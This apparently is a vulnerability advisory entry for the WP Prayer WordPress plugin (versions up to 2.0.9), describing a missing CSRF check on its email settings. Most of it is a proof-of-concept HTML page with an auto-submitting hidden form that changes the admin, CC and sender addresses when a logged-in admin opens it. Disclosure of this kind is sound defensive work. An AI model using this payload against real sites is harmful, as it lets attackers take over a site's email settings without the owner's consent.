WP Prayer <= 2.0.9 - Email Settings Update via CSRF

2024-04-2400:00:00

Bob Matyas

wordpress prayer vulnerability

email settings

cross-site request forgery

exploit

6.7 Medium

AI Score

Confidence

Low

0.0004 Low

EPSS

Percentile

9.1%

JSON

Description The plugin does not have CSRF check in place when updating its email settings, which could allow attackers to make a logged in admin change them via a CSRF attack

Make a logged in admin open an HTML file containing:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=wpe_manage_email_settings" method="post" enctype="multipart/form-data">
        <input type="hidden" name="prayer_req_admin_email" value="[email protected]">
        <input type="hidden" name="wpe_email_cc" value="[email protected]">
        <input type="hidden" name="wpe_email_from" value="csrf">
        <input type="hidden" name="wpe_email_user" value="[email protected]">
        <input type="hidden" name="wpe_email_req_subject" value="CSRF">
        <input type="hidden" name="wpe_email_req_messages" value="csrf">
        <input type="hidden" name="wpe_email_praise_subject" value="csrf">
        <input type="hidden" name="wpe_email_praise_messages" value="csrf">
        <input type="hidden" name="wpe_email_admin_subject" value="csrf">
        <input type="hidden" name="wpe_email_admin_messages" value="csrf">
        <input type="hidden" name="wpe_email_prayed_subject" value="csrf">
        <input type="hidden" name="wpe_email_prayed_messages" value="csrf">
        <input type="hidden" name="save_entity_data" value="Save Changes">
        <input type="hidden" name="operation" value="save">
        <input type="submit" value="Submit">
    </form>
</body>

```